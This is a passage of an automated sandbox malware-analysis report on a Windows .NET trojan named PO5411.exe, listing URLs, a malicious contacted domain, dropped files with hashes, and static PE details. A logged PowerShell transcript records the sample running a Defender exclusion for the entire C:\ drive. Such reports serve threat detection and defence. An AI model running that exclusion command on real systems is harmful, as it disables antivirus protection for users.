                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://wdcp.microspowershell.exe, 0000000E.00000003.878734828.000000000903F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designersexplorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.goodfont.co.krPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://james.newtonking.com/projects/jsonPO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.newtonsoft.com/jsonschemaPO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.carterandcone.comlPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cThePO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-user.htmlPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleasePO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.%s.comPAexplorer.exe, 00000012.00000002.914771509.0000000002B50000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		low
                                              http://www.fonts.comPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleasePO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sakkal.comPO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://wdcp.micros?powershell.exe, 0000000E.00000003.880071680.0000000009043000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.21.21.198
                                                  		www.movementinspires.comUnited States
                                                  		13335CLOUDFLARENETUStrue

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:385218
                                                  Start date:12.04.2021
                                                  Start time:08:28:29
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 26s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:PO5411.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:24
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@10/8@4/1
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 8.3% (good quality ratio 7.7%)
                                                  • Quality average: 72%
                                                  • Quality standard deviation: 30.8%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 92
                                                  • Number of non-executed functions: 309
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 168.61.161.212, 52.147.198.201, 52.255.188.83, 88.221.62.148, 92.123.150.225, 20.50.102.62, 92.122.213.194, 92.122.213.247, 40.88.32.150, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 104.43.139.144
                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, msagfx.live.com-6.edgekey.net, skypedataprdcoleus15.cloudapp.net, authgfx.msa.akadns6.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:30:49API Interceptor32x Sleep call for process: powershell.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  www.013y.comPO4308.exeGet hashmaliciousBrowse
                                                  • 104.164.33.210
                                                  PO7321.exeGet hashmaliciousBrowse
                                                  • 104.164.33.210

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  CLOUDFLARENETUS9479_pdf.exeGet hashmaliciousBrowse
                                                  • 172.67.222.176
                                                  fyi.exeGet hashmaliciousBrowse
                                                  • 172.67.188.154
                                                  inv.exeGet hashmaliciousBrowse
                                                  • 104.21.73.99
                                                  MINUSCA P01-21.exeGet hashmaliciousBrowse
                                                  • 104.21.17.57
                                                  Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                  • 23.227.38.74
                                                  Radix_1_exe.exeGet hashmaliciousBrowse
                                                  • 104.16.16.194
                                                  winlog.exeGet hashmaliciousBrowse
                                                  • 104.21.66.253
                                                  Invoice-ID-(87656532).vbsGet hashmaliciousBrowse
                                                  • 162.159.135.233
                                                  36ne6xnkop.exeGet hashmaliciousBrowse
                                                  • 23.227.38.74
                                                  1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                  • 104.21.61.102
                                                  2EGv1FEjOU.exeGet hashmaliciousBrowse
                                                  • 172.67.222.176
                                                  782kQ15aYm.dllGet hashmaliciousBrowse
                                                  • 104.20.184.68
                                                  P195 NOVO Cinema#2021.exeGet hashmaliciousBrowse
                                                  • 104.21.17.57
                                                  invoice_661434949_67552437.xlsmGet hashmaliciousBrowse
                                                  • 172.67.189.4
                                                  invoice_661434949_67552437.xlsmGet hashmaliciousBrowse
                                                  • 104.21.43.238
                                                  reconocer PO #700-20 D462021,pdf.exeGet hashmaliciousBrowse
                                                  • 172.67.188.154
                                                  shipping document.exeGet hashmaliciousBrowse
                                                  • 162.159.129.233
                                                  Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                  • 162.159.135.233
                                                  setup-1.exeGet hashmaliciousBrowse
                                                  • 104.21.1.88
                                                  Five.exeGet hashmaliciousBrowse
                                                  • 172.67.130.194

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO5411.exe.log
                                                  Process:C:\Users\user\Desktop\PO5411.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):1119
                                                  Entropy (8bit):5.356708753875314
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                  MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                  SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                  SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                  SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):14734
                                                  Entropy (8bit):4.996142136926143
                                                  Encrypted:false
                                                  SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                  MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                  SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                  SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                  SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):22148
                                                  Entropy (8bit):5.605049202787353
                                                  Encrypted:false
                                                  SSDEEP:384:qtCDLS0PpZEZg/dCHRYSBKnaultItW7Y9gN4zJUeRS1BMrmLZ1AV7ObWTuj4I+iA:VpZEgF4KaultSCN4qexa46wx
                                                  MD5:E5ED71CE07CE18DACDA317CB6D086A5A
                                                  SHA1:54400DDF1E08DCB59533A80435398DC30301FCA8
                                                  SHA-256:6A44E45412665348EF513C0EF5905785824FF4E791D5D56E6A702B48426930A4
                                                  SHA-512:C2A48FEDEA18A7E090C0C1528AA8B958ACEB137A86E5E82C383FC125874DA086BED4A4D8BC704B19E690461A8CE79B98C7AC859EAE526F5A877C3C1FC6B05828
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: @...e...........Y.......................>............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                  C:\Users\user\AppData\Local\Temp\PO5411.exe
                                                  Process:C:\Users\user\Desktop\PO5411.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):518656
                                                  Entropy (8bit):7.858398492527444
                                                  Encrypted:false
                                                  SSDEEP:12288:9MGTkPvCLhm6nDabAKCcXjcgMuwS2T8Xo2i10Ol/:iGAP+hnDCAKbjxFWgXh
                                                  MD5:3CD76D38AD07C345862B07D90186851E
                                                  SHA1:E3FC0973898EEE9723B7B92828FFBBAFAA0B5456
                                                  SHA-256:588692919A751E9852CF32E0B1DA42C347F2FF99A2AFD2378C6A7573D7A532FC
                                                  SHA-512:0439FA8B16D1A7744E026A9772E85A3D00DDD90DA3E7CA6B7886D834CFDBA2F7BEF5090357663BDC9F723504899B76DC5D480224B68C2FFDA21128EC144E577E
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\PO5411.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Reputation:low
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`............................k8... ...@....@.. .......................@............@.................................!8..J....@....................... ....................................................... ............... ..H............text...q.... ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B................Q8......H.......09..p,......I....e..............................................*+.*(a...+...0..5.........}.....(........+.. ....(........X........-..(.....*....0..H.........8....8....8.....8....+L8....8.....8.....8....{....8.....(N...(O...(........(....o.....,......X.,.......i2.(....(......(....(.....s...... ..f.(b...}..... ........s....}..... ........s ...}.......4...%. ..f.(b....%. ..f.(b....%. ..f.(b....}.....(!.....(...+.*(....8....(#...8.....8......8.....8......8......8.....8..
                                                  C:\Users\user\AppData\Local\Temp\PO5411.exe:Zone.Identifier
                                                  Process:C:\Users\user\Desktop\PO5411.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quegcxiq.biz.ps1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhdl4r0q.ho5.psm1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\Documents\20210412\PowerShell_transcript.320946.vb3Z+bmj.20210412083021.txt
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5048
                                                  Entropy (8bit):5.385360523869438
                                                  Encrypted:false
                                                  SSDEEP:96:BZIjON5YqDo1ZRZRjON5YqDo1ZXM6UjZnjON5YqDo1ZdFEE+Zc:zhyk
                                                  MD5:867E58150D39311FF448DB9068C6AA7D
                                                  SHA1:AEB669A90CE4836B6FD8A4DA16CBF99A48C55AFC
                                                  SHA-256:221900B3432FB26AC465A5CAF0DC24494BF15C627533D26D3CBF01B45AECE463
                                                  SHA-512:6474DDAC360B5DFEC353BA66B3008FB721AD79E52050AA721D259C853344372535D271E3ABC3E92ECD5C3084FF8F9041FFF8250300F6C1C0BCA0516BA9B3C55B
                                                  Malicious:false
                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210412083041..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 1368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210412083041..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20210412083453..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.858398492527444
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:PO5411.exe
                                                  File size:518656
                                                  MD5:3cd76d38ad07c345862b07d90186851e
                                                  SHA1:e3fc0973898eee9723b7b92828ffbbafaa0b5456
                                                  SHA256:588692919a751e9852cf32e0b1da42c347f2ff99a2afd2378c6a7573d7a532fc
                                                  SHA512:0439fa8b16d1a7744e026a9772e85a3d00ddd90da3e7ca6b7886d834cfdba2f7bef5090357663bdc9f723504899b76dc5d480224b68c2ffda21128ec144e577e
                                                  SSDEEP:12288:9MGTkPvCLhm6nDabAKCcXjcgMuwS2T8Xo2i10Ol/:iGAP+hnDCAKbjxFWgXh
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`............................k8... ...@....@.. .......................@............@................................

                                                  File Icon

                                                  Icon Hash:64f4d4d4e4f4d4d4

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x47386b
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x6073D6CC [Mon Apr 12 05:12:44 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
